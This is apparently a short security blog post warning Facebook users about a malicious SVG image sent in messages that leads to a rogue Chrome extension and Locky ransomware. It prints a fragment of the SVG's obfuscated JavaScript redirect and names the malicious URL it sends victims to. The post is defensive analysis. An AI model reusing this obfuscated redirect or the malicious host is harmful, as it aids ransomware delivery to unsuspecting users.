Facebook SPAM Alert! – Malicious SVG File is Spreading through Facebook Messages

Have you received any kind of Image file through Facebook messages lately?

If yes, Is it in SVG Format?

If it is, Please don’t click on it.

Facebook Spam in messages

Spammers have crafted malicious Image (SVG file) that will make you install ransomeware on to your System and in turn infect all of your friends through the same medium i.e Facebook messages.

Scalable Vector Graphics (SVG) is an XML-based image format used to serve vector images. If you notice, Our logo is also in SVG format. You can download and inspect it by opening the file in a text editor.

The reason the spammers choose to use SVG images for spamming is because it allows dynamic content. Spammers had added malicious JavaScript code right inside the image itself, which in this case was a link to an external file which would in turn download locky Ransomeware.

What would happen if you click that Spam Image?

You can checkout the SVG file code here:

If you look at the SVG file on pastebin, Observe the lines 48 to 51

var hdekw = window;
var ljfji = bxtqxbl("q2wzN=IFPjjmkiEFlo",15,true);
var pryyb = bxtqxbl("xXnDUGnKZcx?URbam",9,false);
var lpvxzt = bxtqxbl("nso6/z",2,false);
hdekw[ljfji][pryyb][lpvxzt] = bxtqxbl("6DK_Ezq4ACorNFc5h9IiELr0p97DN5nBKwAL2FmFOkdrDFeG",10,true);

Spammers have cleverly used cryptographic techniques to bypass Facebook’s file checkers and then execute a window function.

If you log these variables in console:


You would get this:


Clearly it appears that the malicious SVG file is attempting to redirect you to http://mourid.com/php/trust.php, which happens to be a fake YouTube video page that will force you to install malicious Chrome Extension.

Facebook SPAM in SVG file

When the extension gets installed, It would then takes advantage of your browser’s access to your Facebook account to covertly SPAM your friends with the same SVG image file, Helping this SPAM to Spread more.

Furthermore, The extension also downloads “Nemucod downloader”, which is a generic malware downloader generally used to fetch and install various ransomeware. In this case the malware downloader downloads “Locky ransomeware”, leaving your system locked.

You can read more about ransomeware in my previous post on Rise of malicious JavaScript.

Source: @peterkruse